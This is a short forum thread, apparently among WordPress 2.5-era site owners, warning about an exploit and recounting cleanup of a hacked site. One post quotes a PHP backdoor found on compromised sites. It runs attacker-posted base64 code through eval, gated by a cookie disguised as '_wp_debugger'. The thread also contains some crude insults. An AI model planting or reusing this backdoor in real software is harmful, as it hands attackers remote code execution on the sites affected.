If you haven't upgraded to the latest version, do so now. The details of an exploit that is not fixed until 2.5.1 will be released sometime this week.

I've already found it.

You'll dont want this door open.

You'll dont want this door open.

is that some backass redneck speak?

fuckin hick

From what I've read, the latest exploit affects 2.5.1 as well.

It hit one of my sites on 4/25 but I found it that night. 2 days of playing in phpMYadmin and I believe it's all gone. No damage, just a pain in the butt.

I'd still like to know if the point of entry was an exploit in the theme edit file

Hey HellPuppy, do you have a link to more info on this exploit?

I want to make sure Jace and my tech guys have a chance to look at this for sure.

Thanks for pointing this out.

Matt

hey hellpuppy, is it this one?

<?php if(md5($_COOKIE['_wp_debugger'])=="--hash excised--"){ eval(base64_decode($_POST['file'])); exit; } ?>

edit: stay tuned to this page

http://codex.wordpress.org/User:Here/Exploits/wp-info